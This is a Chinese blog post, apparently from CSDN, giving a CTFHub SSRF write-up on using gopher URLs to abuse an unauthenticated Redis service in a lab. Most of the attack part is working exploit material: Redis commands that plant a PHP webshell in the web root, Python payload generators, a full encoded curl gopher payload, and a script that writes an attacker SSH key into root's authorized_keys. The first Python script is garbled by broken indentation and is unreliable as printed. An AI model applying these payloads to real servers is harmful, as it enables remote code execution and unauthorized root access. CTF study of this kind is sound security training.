ctfhub--redis协议(巧用redis攻击内网)

最新推荐文章于 2024-03-29 18:33:49 发布
最新推荐文章于 2024-03-29 18:33:49 发布
阅读量1.8k 收藏 1
点赞数 1
文章标签: redis web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64201116/article/details/125456025
版权

题目内容:这次来攻击redis协议吧.redis://127.0.0.1:6379,资料?没有资料!自己找!

解题:

1.在gopherus上面输入命令:python gophers.py --exploit redis

ReverseShell应该是反弹shell PHPshell就是webshell了

选择phpshell 然后其他都默认就可以了,默认的写入文件名是shell.php 默认的命令参数是cmd

2.要记得_后面的内容要再url编码一下。有一个注意点就是这里得到的是命令行参数命令

因为他的语句是这样的:

flushall

set 1 '<?php system($_GET["cmd"]);?>'

config set dir /var/www/html

config set dbfilename shell.php

save

如果你是 url/shell.php?cmd=phpinfo(); 是不行的,因为这里是命令行参数。因此连接不了菜刀或者蚁剑

后面就是shell.php?cmd=ls /  再shell.php?cmd cat /flag了

 知其所以然:(Redis未授权访问攻击复现)

 

初识Gopher::

他是在HTTP出现以前的协议,后来因为HTTP逐渐淡出视野。Gopher协议没有默认端口所以要指定,因此有了下面的基本格式

最基本的格式:

gopher://<host>:<port>/<gopher-path>_后接TCP数据流

Gopher可以发送POST数据也可以发送GET数据。而且Gopher回车换行是%0d%0a,所以不使用工具总是要自己用脚本把%0a改成%0d%0a。而且POST参数之间的&分隔符也需要URL编码。同时Gopher还可以对FTP、Telnet、Redis、Memcache、mysql进行攻击,以及上面第一题提到的fastcgi。

Redis的利用大概有这几种方式:

1.绝对路径写webshell

2.写ssh公钥

3.写contrab计划任务反弹shell

4.主从复制

铺垫工作:

1.靶机(192.168.65.150 ubuntu)

2.攻击机(192.168.65.145 kali )

3.安装redis

4.开启ssh服务

1.绝对路径写webshell(最常见的)

先构造一下redis的语句:

flushall

config set dir /var/www/html/

config set dbfilename shell.php

set x "<?php eval($_REQUEST[cmd])?>"

save

再使用一个脚本把这个redis语句转换一下

 

import urllib
protocol="gopher://"
ip="192.168.65.145"
port="6379"
shell="\n\n<?php eval($_REQUEST[\"cmd\"]);?>\n\n"
filename="shell.php"
path="/var/www/html"
passwd=""
cmd=["flushall",
     "set 1 {}".format(shell.replace(" ","${IFS}")),
     "config set dir {}".format(path),
     "config set dbfilename {}".format(filename),
     "save"
    ]
if passwd:
    cmd.insert(0,"AUTH {}".format(passwd))
    payload=protocol+ip+":"+port+"/_"
    def redis_format(arr):
        CRLF="\r\n"
        redis_arr = arr.split(" ")
        cmd=""
        cmd+="*"+str(len(redis_arr))
        for x in redis_arr:
            cmd+=CRLF+"$"+str(len((x.replace("${IFS}"," "))))+CRLF+x.replace("${IFS}"," ")
            cmd+=CRLF
            return cmd
        
        if __name__=="__main__":
            for x in cmd:
                payload += urllib.quote(redis_format(x))
    print payload

 

生成语句:

curl gopher://192.168.65.150:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2435%0D%0A%0A%0A%3C%3Fphp%20eval%28%24_REQUEST%5B%22cmd%22%5D%29%3B%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A

这个是攻击机运行的命令

可以看到靶机生成了shell.php

2.写ssh公钥

import urllib

protocol = "gopher://"
ip = "192.168.163.128"
port = "6379"
shell = "\n\n<?php eval($_GET[\"cmd\"]);?>\n\n"
filename = "authorized_keys"
path = "/root/.ssh/"
ssh_pub="\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDZ4COG/WedK5DMzzUrXon27jTinJr7p7fqXUuQmDELqSmtVJEhM7PDcfuELxB49GnxERabS+jKiylRuMDPw+OQYxLOANuWt8F0L5vCzik2ADn6OsD7Pq/vqCXo6gOHAKdueG8PsoeShw0DgUhwdd0jzSrz3RciuSo9Ka8y8QCU0BqQbosYxWVDpr2pzqkBL8LEB9oUu06ug5hJNoG1rpCPbebXCVCPvnnFVWuDHb0u9DSZz8a1LSREF1aDDjAHrc5TMOMh4LpIIaIbLq55/ZBI3KHEOfmpeKa+G56BcO03PV9L9Dx8XpT2p77zwOZWNRtHOTSV5o1qdwGyRNkff5Hhe5BojG5zwdzjkoduAs4s8pqPEYe4XiPrA2vkJuaYDG0pMNlCbwDmIKos6rr6iBJvgp9vTRGrlzqlf2HLqN9Bxmd52/6TQD5xgA0XsNPNr6EWVzS/NS9cZ5MJ3gzCJWkZEfMmNyaJwcul6Q3PPykN+iQ5pd9vejcsMeCEgdZVRhU= root@kali\n\n"
passwd = ""
cmd = ["flushall",
       "set 1 {}".format(ssh_pub.replace(" ", "${IFS}")),
       "config set dir {}".format(path),
       "config set dbfilename {}".format(filename),
       "save"
       ]
if passwd:
    cmd.insert(0, "AUTH {}".format(passwd))
payload = protocol + ip + ":" + port + "/_"


def redis_format(arr):
    CRLF = "\r\n"
    redis_arr = arr.split(" ")
    cmd = ""
    cmd += "*" + str(len(redis_arr))
    for x in redis_arr:
        cmd += CRLF + "$" + str(len((x.replace("${IFS}", " ")))) + CRLF + x.replace("${IFS}", " ")
    cmd += CRLF
    return cmd


if __name__ == "__main__":
    for x in cmd:
        payload += urllib.quote(redis_format(x))
    print(payload)

 

之后使用curl把我们的公钥写进ssh,这里要注意靶机的ssh服务一定是开启的

可以看到,成功写入。

之后再使用ssh服务连接一下靶机。

成功吃到shell

清风--
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
resty-redis-cluster:Redis集群的Openresty lua客户端
02-03
resty-redis-cluster:Redis集群的Openresty lua客户端
node-cache-manager-redis-store:使用node_redis的Node-cache-manager的Redis存储
02-05
用于节点缓存管理器的Redis存储Redis...安装npm install cache-manager-redis-store --save 要么yarn add cache-manager-redis-store使用范例请参阅以下示例,了解如何实现Redis缓存存储。单店var cacheManager = requ
CTFHub | MySQL流量、Redis流量、MongoDB流量的WriteUp
2301_76435948的博客
10-25 392
数据库类流量题需要用到Wireshark截取数据包,然后进行分析。WireShark是非常流行的网络封包分析工具,可以截取各种网络数据包,并显示数据包详细信息。常用于开发测试过程中各种问题定位。下面我们来看三道数据库流量题吧。
CTFHub SSRF 题目
来日可期的博客
10-12 726
sftp:// :SH文件传输协议安全文件传输协议(Secure File Transfer Protocol)是一种简单的基于lockstep机制的文件传输协议,允许客户端从远程主机获取文件或将文件上传至远程主机。使用DNS重绑定,从DNS域名解析入手,有一个想法就是通过修改域名对应的IP,使一个域名对应两个IP,那么在多次的访问之下产生的访问效果是一样的实现IP绕过。将抓取的数据包全部复制,创建一个python脚本1.py,然后将复制的内容粘贴到下面文件的payload中,通过脚本对请求包进行编码。
CTFHUB--SSRF(中)--FastCGI协议\Redis协议 以及gopherus工具攻击
最新发布
qq_75120258的博客
03-29 1284
本来我们可以执行任意文件,但是在FPM某个版本之后,增加了security.limit_extensions选项,限定了只有某些后缀的文件允许被fpm执行,默认是.php,所以现在要使用这个漏洞,我们得先知道服务器上的一个php文件,假设我们爆破不出来目标环境的web目录,我们可以找找默认源安装后可能存在的php文件,比如/usr/local/lib/php/PEAR.php。FastCGI是一个常驻型的CGI,它在服务器启动的时候先启动一个应用程序池,然后由这个应用程序池来管理和调度应用程序的执行。
CTFHub-Redis
鸣蜩十四的博客
08-09 577
和fastcgi的题比较类似,使用gopherus生成redis的shell,经过一次url编码,就构成了最终的payload,注意的是redis的端口是6379 经过一次编码,bp使用gopher协议发包,虽然是504,但是我们的shell已经传输上去了,用蚁剑链接查看flag ...
CTFHub题解-技能树-Misc-流量分析-数据库类流量【MySQL流量、Redis流量、MongoDB流量】
wlw_xx的博客
08-15 1411
CTHUB wireshark简单学习
CTFHub技能树 Web-SSRF Redis协议
Senimo
07-05 1693
CTFHub技能树 Web-SSRF Redis协议 hint:这次来攻击redis协议吧.redis://127.0.0.1:6379,资料?没有资料!自己找! 启动环境,依然为空白,查看URL: http://challenge-bd5faa8b900de693.sandbox.ctfhub.com:10800/?url=_ 通过GET方式传递参数url的值,题目提示为攻击Redis协议。 使用Gopherus生成所需攻击Redis的Paylaod: 选择PHPShell,根目录路径为默认值,使用默
CTFHUB-SSRF-Redis协议
qq_62078839的博客
04-23 1878
利用工具gopherus来生成payload 这里我们进行第二次url编码时,不需要再将%0a换为%0d%0a了,因为生成的payload已经替换了 gopher%3A//127.0.0.1%3A6379/_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252432%250D%250A%250...
CTFHub SSRF Redis协议 WriteUp
柠檬i的博客
12-31 466
SSRF+Redis组合拳绝对路径写webshell
CTFHub-->web-->ssrf-->Redis协议
unlash的博客
09-20 372
CTFHub redis获取flag步骤详解 redis协议 gopherus.py
CTFHub ssfr FastCgi协议 & Redis 协议
m0_62879498的博客
02-18 1801
ctfhub ssfr FastCgi & Redis 协议 FastCgi协议 这次.我们需要攻击一下fastcgi协议咯.也许附件的文章会对你有点帮助 首先我们要先了解这个协议内容(具体查看ctfhub里面的文章) 在本关我们可以尝试使用linux解决问题(**需要下载python2版本!!!,否则Gopherus无法读取 **并且下载Gopherus脚本) linux python2下载方法: [参考博客]((1条消息) 完美解决 Linux安装python2.7 方案_你懂了我的冬天的博客
CTFHUB Redis流量
plant1234的博客
06-06 752
Redis流量: 知识点 : wireshark过滤搜索功能、字符串拼接 打开发现只有一半flag: 在往下找流量发现第二段flag:
flink-connector-redis-2.10-1.1.5-API文档-中文版.zip
07-14
赠送jar包:flink-connector-redis_2.10-1.1.5.jar; 赠送原API文档:flink-connector-redis_2.10-1.1.5-javadoc.jar; 赠送源代码:flink-connector-redis_2.10-1.1.5-sources.jar; 赠送Maven依赖信息文件:flink-...
spring-session-data-redis-2.0.4.RELEASE-API文档-中英对照版.zip
06-12
赠送jar包:spring-session-data-redis-2.0.4.RELEASE.jar; 赠送原API文档:spring-session-data-redis-2.0.4.RELEASE-javadoc.jar;...使用方法:解压翻译后的API文档,用浏览器打开“index.html”文件,即可纵览文
spring-session-data-redis-2.0.4.RELEASE-API文档-中文版.zip
06-26
赠送jar包:spring-session-data-redis-2.0.4.RELEASE.jar; 赠送原API文档:spring-session-data-redis-2.0.4.RELEASE-...使用方法:解压翻译后的API文档,用浏览器打开“index.html”文件,即可纵览文档内容。 人性化
CTFHub SSRF
LYJ20010728的博客
08-10 666
CTFHub SSRFSSRF简介漏洞攻击方式CTFHub SSRF靶场第一部分(Http、Dict和file等协议的利用)内网访问伪协议读取文件端口扫描 SSRF简介 SSRF (Server-Side Request Forgery,服务器端请求伪造) 是一种由攻击者构造请求,由服务端发起请求的安全漏洞,一般情况下,SSRF攻击的目标是外网无法访问的内网系统,也正因为请求是由服务端发起的,所以服务端能请求到与自身相连而与外网隔绝的内部系统,也就是说可以利用一个网络请求的服务,当作跳板进行攻击
SSRF - ctfhub -2【FastCGI协议Redis协议、URL Bypass、数字IP Bypass、302跳转 Bypass、DNS重绑定Bypass】
bin789456的博客
11-18 2209
FastCGI协议 知识参考:CTFhub官方链接 首先介绍一下原理(这里简单介绍,详情请看官方附件) 如果说HTTP来完成浏览器到中间件的请求,那么FastCGI就是从中间件到某语言后端进行交换的协议。 和浏览器请求包一样,也是由header、body组成。 还需要提到一个PHP-FPM,FastCGI进程管理器,即在php中(nginx等服务器中间件)FastCGI规则打包好后传递的终点,最后由FPM按照fastcgi的协议将TCP流解析成真正的数据。 比如打包好的数据长这样 { 'GATEWA
SSRF详解 基于CTFHub(下篇)
Bossfrank的博客
04-28 1070
本文简要介绍了SSRF服务端请求伪造的原理,并通过CTFHub的实例,介绍SSRF的基本原理、利用方式、绕过思路等。
spring-boot-starter-data-redis与spring-boot-starter-redis区别
10-13
spring-boot-starter-data-redis和spring-boot-starter-redis都是Spring Boot框架中与Redis集成的starter依赖,但它们的作用略有不同。 spring-boot-starter-data-redis是Spring Data Redis的starter依赖,它提供了对Redis的支持,包括使用RedisTemplate和Spring Data Redis Repository访问Redis数据库等功能。 而spring-boot-starter-redis则是Lettuce和Jedis的starter依赖,它提供了对Redis客户端的支持,包括使用Lettuce或Jedis连接Redis服务器等功能。 因此,如果你需要在Spring Boot应用中使用Spring Data Redis提供的高级功能,比如Repository访问等,则应该选择spring-boot-starter-data-redis;如果你只需要使用Redis客户端连接Redis服务器,则可以选择spring-boot-starter-redis

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值